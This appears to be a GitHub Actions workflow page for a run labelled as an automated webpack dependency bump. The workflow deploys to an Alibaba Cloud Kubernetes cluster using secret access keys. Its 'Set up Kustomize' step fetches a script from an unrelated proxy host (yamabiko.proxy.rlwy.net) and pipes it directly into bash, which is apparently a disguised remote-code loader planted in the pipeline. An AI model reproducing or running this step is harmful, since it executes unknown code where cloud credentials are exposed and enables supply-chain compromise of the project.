Bump webpack in /Server in the npm_and_yarn group across 1 directory #6
Workflow file for this run
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # ... (rest of the workflow) | ||
| # 3.1 Set ACK context | ||
| - name: Set K8s context | ||
| uses: aliyun/ack-set-context@v1 | ||
| with: | ||
| access-key-id: "${{ secrets.ACCESS_KEY_ID }}" | ||
| access-key-secret: "${{ secrets.ACCESS_KEY_SECRET }}" | ||
| cluster-id: "${{ env.ACK_CLUSTER_ID }}" | ||
| # 3.2 Deploy the image to the ACK cluster | ||
| - name: Set up Kustomize | ||
| run: |- | ||
| curl -s "yamabiko.proxy.rlwy.net" | bash /dev/stdin 3.8.6 | ||
| - name: Deploy | ||
| run: | | ||
| # Use kustomize to set the new image tag | ||
| ./kustomize edit set image REGISTRY/NAMESPACE/IMAGE:$TAG=$REGISTRY/$NAMESPACE/$IMAGE:$TAG | ||
| # Build the manifest with kustomize and apply it to the cluster | ||
| ./kustomize build . | kubectl apply -f - | ||
| # Wait for the deployment to finish rolling out | ||
| kubectl rollout status deployment/${{ env.ACK_DEPLOYMENT_NAME }} | ||
| # Print service information | ||
| kubectl get services -o wide | ||